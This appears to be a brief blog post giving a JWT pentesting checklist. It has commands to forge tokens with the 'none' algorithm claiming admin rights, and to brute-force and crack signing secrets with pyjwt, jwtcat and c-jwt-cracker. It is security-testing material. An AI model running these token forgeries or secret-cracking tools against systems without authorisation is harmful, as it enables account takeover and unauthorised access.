Pentesting JWT tokens

When you encounter a JWT token and verify (at JWT.io) if secret (password) was used to generate the JWT, do the following:

  1. Create a JWT token with None algorithm and pass with required parameters (say for example user=Admin)
  2. Try to bruteforce the JWT token with a wordlist containing common passwords
  3. Try to crack the JWT secret key using c-jwt-cracker

PyJWT

  • Installing: pip install pyjwt
  • Create JWT with None alg: pyjwt --alg=none --key=none encode user=test1 admin=false iat=1564989485 exp=1565075885
  • Create JWT with secret: pyjwt --key=secret encode user=test1 admin=false iat=1564989485 exp=1565075885
  • Check if a secret is valid: pyjwt --key=secret decode "json.web.token"

JWT Bruteforce (using wordlist)

Bruteforce JWT tokens (using https://github.com/AresS31/jwtcat): python3 jwtcat.py -t "json.web.token" -w worlist.txt

JWT Crack

https://github.com/brendan-rius/c-jwt-cracker

brew install openssl

git clone https://github.com/brendan-rius/c-jwt-cracker
cd c-jwt-cracker
make OPENSSL=/usr/local/opt/openssl/include OPENSSL_LIB=-L/usr/local/opt/openssl/lib
./jwtcrack "json.web.token"
Feel free to share this article:
error0
Tweet 20
fb-share-icon20

Leave a Reply

Your email address will not be published. Required fields are marked *